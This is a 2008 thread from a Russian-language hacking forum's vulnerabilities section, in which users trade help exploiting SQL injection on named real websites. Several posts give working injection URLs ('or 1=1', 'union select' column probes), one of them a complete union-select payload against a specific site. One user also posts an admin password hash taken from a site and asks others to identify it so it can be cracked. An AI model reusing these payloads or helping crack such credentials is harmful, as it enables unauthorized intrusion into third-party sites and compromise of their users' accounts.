ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4301  
Старый 26.12.2008, 20:15
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

[dei]
ну да, это круто, но мне надо понять эффективнось этого скрипта, суть..
и вообше стоит братся за это - в целях взлома форума ?
 
Ответить с цитированием

  #4302  
Старый 26.12.2008, 21:31
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Подскажите, как можно раскрутить скулю
Цитата:
http://www.world-art.ru/people.php?id=-1'
Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.

Последний раз редактировалось Thrasher88; 26.12.2008 в 22:48..
 
Ответить с цитированием

  #4303  
Старый 26.12.2008, 22:41
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

Цитата:
Сообщение от Thrasher88  
Подскажите, как можно раскрутить скулю

Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
c чего ты взял что там есть инъекция?вывод на 1 и на 9999 одинаковый..по моему там скулей даже и не пахнет..
 
Ответить с цитированием

  #4304  
Старый 26.12.2008, 22:44
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Ну хз скуля это или нет.. вот что выводит:
Цитата:
Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/vhosts/world-art.ru/httpdocs/people.php on line 1889

Последний раз редактировалось Thrasher88; 26.12.2008 в 22:47..
 
Ответить с цитированием

  #4305  
Старый 26.12.2008, 23:05
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

admin:4b6dP//qJjChSbt+7It3DYY=
Что за хеш?
 
Ответить с цитированием

  #4306  
Старый 26.12.2008, 23:20
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
 
Ответить с цитированием

  #4307  
Старый 26.12.2008, 23:30
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от -m0rgan-  
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
не сказал бы что очень уж похоже не дес, и как понять что с форума ?

походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..
 
Ответить с цитированием

  #4308  
Старый 26.12.2008, 23:39
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от 159932  
хотя не зватает 4х символов ..
Всё там хватает у них по 24, одна из этих :

MD5(Base64)
MD4(Base64)
MD2(Base64)

Цитата:
Сообщение от -m0rgan-  
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
Мда (с)
 
Ответить с цитированием

  #4309  
Старый 27.12.2008, 08:52
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

как оно?
Цитата:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+or+1=2/*
хз не подберается)
Цитата:
http://www.astafiev.ru/forum.php?UID=16197+union+select+1,2/*
вывода нету чтоли?
Цитата:
http://juggling.tv/vaults/uvideos.php?UID=347+or+1=1/*
немогу разкуртить =0
Цитата:
http://www.fortwaynereader.com/story.php?uid=-728+or+1=1

Последний раз редактировалось sabe; 27.12.2008 в 09:36..
 
Ответить с цитированием

  #4310  
Старый 27.12.2008, 11:21
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

http://juggling.tv

Код:
http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5--
____________________________________________

http://www.astafiev.ru

Да, без вывода.

____________________________________________

http://www.fortwaynereader.com

Тут, похоже, нужно указывать группировку по полю
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ